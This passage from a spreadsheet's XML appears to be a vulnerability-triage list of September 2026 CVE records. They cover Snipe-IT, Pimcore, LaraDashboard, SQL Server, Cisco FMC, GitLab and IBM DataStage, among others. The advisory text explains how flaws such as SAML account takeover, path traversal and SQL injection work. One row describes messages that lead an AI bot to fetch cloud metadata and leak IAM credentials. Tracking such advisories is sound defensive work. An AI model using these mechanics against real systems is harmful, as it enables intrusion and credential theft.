      <c r="K311" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr"/>
      <c r="Q311" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 does not apply the CheckUserIsActivated middleware to the `api` middleware group in app/Http/Kernel.php, and deactivating a user does not revoke that user's Passport personal access tokens. As a result, although a deactivated account is correctly refused at web login, its existing API token continues to authenticate and to grant read and write access to the REST API (assets, users, licenses, etc.) at the account's prior permission level until the token expires. A deactivated account that retains user-management permissions can re-activate itself through the API, permanently defeating the deactivation control.</t>
        </is>
      </c>
      <c r="S311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86762</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86770</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr"/>
      <c r="Q312" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate username case sensitivity during SAML authentication, allowing attackers to authenticate as different users by registering IdP accounts with accent or case variants of victim usernames. Attackers can exploit the default utf8mb4_unicode_ci database collation to bypass username matching and achieve account takeover through federated login paths including SAML, LDAP, and OAuth.</t>
        </is>
      </c>
      <c r="S312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86770</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90608</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr"/>
      <c r="Q313" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Totolink A3002MU Hh-B20211125.1046. The affected element is the function formPortFw of the file /boafrm/formPortFw of the component boa. This manipulation of the argument service_type causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90608</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90932</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>LaraDashboard versions 0.9.2 through 1.2.2 contain a path traversal vulnerability in the core-upgrade backup handling. CoreUpgradeController and BackupService (e.g. BackupService::deleteBackup()) concatenate the user-supplied backup_file/filename value directly onto the backup directory path without normalisation, without applying basename(), and without verifying that the resolved path remains inside storage/app/core-backups; the corresponding form requests only validate the value as a bounded string. An authenticated user holding only the delegated settings.edit permission (not Superadmin) can supply ../ traversal sequences to delete arbitrary files reachable on the host filesystem, including outside the application tree, or to restore a ZIP archive from an arbitrary on-disk location, writing arbitrary files into the application directories and achieving remote code execution. Note: the advisory states the vulnerable concatenation was introduced in the v0.9.7 release line. No patched version was available at the time of publication.</t>
        </is>
      </c>
      <c r="S314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90932</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91098</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr"/>
      <c r="Q315" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91098</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91105</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr"/>
      <c r="Q316" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91105</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92576</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr"/>
      <c r="Q317" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>HKUDS nanobot before 0.3.0 contains a server-side request forgery vulnerability in the WebFetchTool component where the _validate_url() function fails to block internal IP ranges and private addresses. Attackers can send messages instructing the bot to fetch cloud metadata endpoints, localhost services, and RFC 1918 addresses to extract IAM credentials and internal service data.</t>
        </is>
      </c>
      <c r="S317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92576</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55072</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr"/>
      <c r="Q318" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-89</t>
        </is>
      </c>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 2026.1.5, an authenticated user with the objects permission can submit a malicious ClassDefinition UID because the name and ID validation expressions in models/DataObject/ClassDefinition.php validate only the beginning of each value. When a data object of that class containing a Block field is loaded, Block::load in models/DataObject/ClassDefinition/Data/Block.php incorporates the stored class ID into an unquoted object table identifier, allowing the UID to supply SQL syntax. The resulting query can read or modify arbitrary Pimcore database tables, including disclosure of password hashes, and the flaw represents an incomplete validation hardening because earlier work added a start anchor without enforcing the end of the identifier. This issue is fixed in version 2026.1.5.</t>
        </is>
      </c>
      <c r="S318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55072</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr"/>
      <c r="Q319" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr"/>
      <c r="Q320" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70341</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr"/>
      <c r="Q321" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Edge (Chromium-based) allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70341</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76412</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr"/>
      <c r="Q322" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the remote diagnostics debugger of Cisco Secure FMC Software could allow an authenticated, remote attacker to enable the remote diagnostics debugger service.
This vulnerability is due to an error when checking the privilege level of a user who is invoking remote diagnostics. An attacker could exploit this vulnerability by authenticating to the device, either through the web-based management interface or the REST API, and using the remote diagnostics debugger to grant a user elevated privileges. A successful exploit could allow the attacker to elevate privileges to root.
Notes:
To exploit this vulnerability, the attacker must have valid user credentials on the affected device.
The CVSSv3.1 Attack Complexity is High due to the multistage process required to fully exploit this vulnerability.</t>
        </is>
      </c>
      <c r="S322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76412</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79708</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr"/>
      <c r="Q323" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 19.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that, under certain conditions could have allowed an authenticated user with developer permissions to execute a policy test pipeline on projects within their group and access protected CI/CD variables restricted to higher-privileged roles, due to insufficient scope validation.</t>
        </is>
      </c>
      <c r="S323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79708</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80436</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service by deleting arbitrary RabbitMQ queues or exchanges due to improper authorization.</t>
        </is>
      </c>
      <c r="S324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80436</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81207</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr"/>
      <c r="Q325" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 allows any authenticated tenant — with no project membership or role — fully controls scheme/host/port/path of an outbound fetch originating from a shared-infrastructure pod, and the WSDL body is reflected verbatim to the caller. The ds-canvas pod sits on the OpenShift overlay with reach to co-tenant services, in-cluster CP4D APIs, and link-local addresses. Scope is Changed, confidentiality High (response-reflecting), integrity Low (GET-only side-effects).</t>
        </is>
      </c>
      <c r="S325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81207</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81540</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr"/>
      <c r="Q326" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to overwrite ruleset files belonging to other tenants due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81540</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86359</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr"/>
      <c r="Q327" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="R327" s="5" t="inlineStr">
        <is>
